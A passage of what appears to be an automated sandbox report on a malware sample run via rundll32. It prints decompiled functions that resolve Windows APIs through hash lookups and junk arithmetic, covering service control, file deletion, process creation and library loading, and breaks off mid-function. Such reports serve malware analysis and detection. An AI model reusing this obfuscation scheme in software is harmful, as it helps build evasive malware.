                                              0x001df6de

                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001DF6D8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: 25db9c83cd685e5ff74837f7b26bcfb941d860824d8c17e223a5a90ae44bee76
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 7F01E5B6901208BFEF059F94DC468DF7F75EB19324F148188F90462250D7B25E61DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001DB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E001DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001D602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                              0x001db6f3
                                              0x001db6f8
                                              0x001db702
                                              0x001db70b
                                              0x001db712
                                              0x001db719
                                              0x001db720
                                              0x001db727
                                              0x001db72e
                                              0x001db747
                                              0x001db759
                                              0x001db75e

                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001DB759
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: 4e94c54c4c2e972598a0f63784df660732168030f90fb273d613f908c69640ee
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: DF0128B6941308FBEB45DF94DD06A9E7BB5EB18704F108188FA09661A0D3B25E20AB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001EAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E001EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                              0x001eaa3f
                                              0x001eaa40
                                              0x001eaa41
                                              0x001eaa44
                                              0x001eaa47
                                              0x001eaa4b
                                              0x001eaa4c
                                              0x001eaa51
                                              0x001eaa5b
                                              0x001eaa64
                                              0x001eaa68
                                              0x001eaa6f
                                              0x001eaa76
                                              0x001eaa8d
                                              0x001eaa90
                                              0x001eaa9d
                                              0x001eaaa8
                                              0x001eaaad

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001EAAA8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 6cc9e9da56f875ccb929634986dd8fabee2daaccf13b632fb616f58897090f90
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 20F019B590020CFFDF08DF94DD4A99EBFB5EB45304F108198F915A6250D3B69F549B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001D5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E001D5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                              0x001d5fb5
                                              0x001d5fb6
                                              0x001d5fb7
                                              0x001d5fbb
                                              0x001d5fbc
                                              0x001d5fc1
                                              0x001d5fcb
                                              0x001d5fd7
                                              0x001d5fde
                                              0x001d5fe5
                                              0x001d5ffc
                                              0x001d5fff
                                              0x001d6006
                                              0x001d600d
                                              0x001d601a
                                              0x001d6025
                                              0x001d602a

                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001D6025
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: 21e3675d678c7d47ccde82411a3224adeb747ad6c423f1aa475c33c6d4e2ced6
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: 7DF04FB0C11208FFDB08DFA0E94689EBFB8EB54300F208198E409A7260E7B15F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Analysis Process: rundll32.exe PID: 2836 Parent PID: 3056 rundll32.exeCOMMON

                                              Executed Functions

                                              Function 004B2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E004B2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E004B602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E004C07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                              0x004b295f
                                              0x004b2964
                                              0x004b2967
                                              0x004b296a
                                              0x004b296d
                                              0x004b296e
                                              0x004b296f
                                              0x004b2977
                                              0x004b2985
                                              0x004b298a
                                              0x004b2992
                                              0x004b299a
                                              0x004b29a2
                                              0x004b29a9
                                              0x004b29b0
                                              0x004b29b7
                                              0x004b29bb
                                              0x004b29cf
                                              0x004b29dc
                                              0x004b29e2

                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 004B29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 06e9d43b6f3b5c25e848dd7324d8f7c4e00a6a07bfeeab89d847c5a6a7e7eea5
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: E3015B72A01108BBEB18DF95DC0A8DFBFB6EF44310F108099F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004BC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E004BC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E004B602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E004C07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                              0x004bc6e1
                                              0x004bc6e6
                                              0x004bc6f0
                                              0x004bc6fc
                                              0x004bc703
                                              0x004bc706
                                              0x004bc70d
                                              0x004bc711
                                              0x004bc715
                                              0x004bc71c
                                              0x004bc723
                                              0x004bc72a
                                              0x004bc731
                                              0x004bc738
                                              0x004bc751
                                              0x004bc762
                                              0x004bc768

                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 004BC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: dbc117d9dee57b0571df33964465c770a4b78adf50b388f2044d157d9ce9a555
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 141122B290122DBBCB25DF95DC498DFBEB8EF04714F108188B90962210D3754A659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004B1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E004B1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E004B602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E004C07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                              0x004b1006
                                              0x004b1009
                                              0x004b100c
                                              0x004b1011
                                              0x004b1016
                                              0x004b101d
                                              0x004b1026
                                              0x004b102d
                                              0x004b1034
                                              0x004b103b
                                              0x004b1047
                                              0x004b104f
                                              0x004b1057
                                              0x004b105e
                                              0x004b1065
                                              0x004b106c
                                              0x004b1073
                                              0x004b1077
                                              0x004b108b
                                              0x004b1096
                                              0x004b109b

                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 004B1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: 69f0356ebac370d937dbdb1450612bc80795ee69c6fda0e125475a12bab41ae0
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: E0016DB6D0130CFBDF04DF94C94AADEBBB1EF54318F10818CE41466291D3B59B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004B4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E004B4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E004C07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                              0x004b485e
                                              0x004b487a
                                              0x004b487d
                                              0x004b4884
                                              0x004b488b
                                              0x004b4892
                                              0x004b489d
                                              0x004b48a0
                                              0x004b48ad
                                              0x004b48b7

                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 004B48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: 60ec550acc5e9f3fded07c341001b7ac3d4c8e4adfe62b528d6c4a0a3540f53b
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: 53F017B0A05209FBDB48CFE8CA56A9EBFB9EB40305F20819DE444B7290E3B15F509B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004C4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E004C4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E004B602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E004C07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                              0x004c4f80
                                              0x004c4f81
                                              0x004c4f82
                                              0x004c4f86
                                              0x004c4f87
                                              0x004c4f8c
                                              0x004c4fa5
                                              0x004c4fa8
                                              0x004c4faf
                                              0x004c4fb6
                                              0x004c4fc7
                                              0x004c4fca
                                              0x004c4fd7
                                              0x004c4fe2
                                              0x004c4fe7

                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 004C4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 3c8013a9c9bb3574230be50aecd2342c7c6208b26763d49484c52de2396c872a
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 61F037B081120CFFDF08EFA5D94289EBFBAEB40304F20819DE804AB250D3715B509B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004C976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 21%
                                              			E004C976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E004B602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E004C07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                              0x004c9772
                                              0x004c9773
                                              0x004c9778
                                              0x004c977a
                                              0x004c977b
                                              0x004c977e
                                              0x004c977f
                                              0x004c9782
                                              0x004c9785
                                              0x004c9788
                                              0x004c9789
                                              0x004c978c
                                              0x004c978f
                                              0x004c9790
                                              0x004c9791
                                              0x004c9794
                                              0x004c9797
                                              0x004c979a
                                              0x004c979d
                                              0x004c97a0
                                              0x004c97a3
                                              0x004c97a6
                                              0x004c97a7
                                              0x004c97a8
                                              0x004c97ad
                                              0x004c97b7
                                              0x004c97c3
                                              0x004c97ca
                                              0x004c97d1
                                              0x004c97d8
                                              0x004c97df
                                              0x004c97e3
                                              0x004c97fc
                                              0x004c9816
                                              0x004c981d

                                              APIs
                                              • CreateProcessW.KERNEL32(004B591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,004B591A), ref: 004C9816
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: 710513b77a099025bd463c025ad843cb800bd04d11b1b37a1c645c9d49785139
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: E711D072801188FBDF1A9F92DC0ACDF7F3AEF89750F108048FA1452120D2768A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004BB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E004BB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E004B602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E004C07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                              0x004bb569
                                              0x004bb56a
                                              0x004bb56d
                                              0x004bb572
                                              0x004bb574
                                              0x004bb577
                                              0x004bb57a
                                              0x004bb57d
                                              0x004bb580
                                              0x004bb583
                                              0x004bb586
                                              0x004bb587
                                              0x004bb58a
                                              0x004bb58d
                                              0x004bb590
                                              0x004bb593
                                              0x004bb594
                                              0x004bb595
                                              0x004bb59a
                                              0x004bb5a4
                                              0x004bb5b8
                                              0x004bb5c0
                                              0x004bb5c4
                                              0x004bb5cb
                                              0x004bb5d2
                                              0x004bb5d9
                                              0x004bb5e6
                                              0x004bb5fd
                                              0x004bb604

                                              APIs
                                              • CreateFileW.KERNELBASE(004C0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,004C0668,?,?,?,?), ref: 004BB5FD
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 773bfd9854294777500840f35b6a665c8c88e842aad04c309bfbb920b5262662
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 5411E232801208BBDF16DF95DD06CEE7F7AEF89314F108198FA1862120D3769A20EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004C981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E004C981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E004B602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E004C07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                              0x004c9821
                                              0x004c9822
                                              0x004c9825
                                              0x004c9828
                                              0x004c982a
                                              0x004c982c
                                              0x004c982f
                                              0x004c9832
                                              0x004c9835
                                              0x004c9836
                                              0x004c9837
                                              0x004c983c
                                              0x004c9855
                                              0x004c9858
                                              0x004c985f
                                              0x004c9866
                                              0x004c986d
                                              0x004c9874
                                              0x004c987b
                                              0x004c988e
                                              0x004c989b
                                              0x004c98a2

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,004B87F2,0000CAAE,0000510C,AD82F196), ref: 004C989B
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: b546705c803b88a60c6eb6c240abbc21ff7c1027c5a6cc7093fdb842c85d19af
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 56014876801208FBDB08EF95D846CDFBF79EF85750F10819DF918A6220E6715A619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004C7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E004C7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E004B602B(_t24);
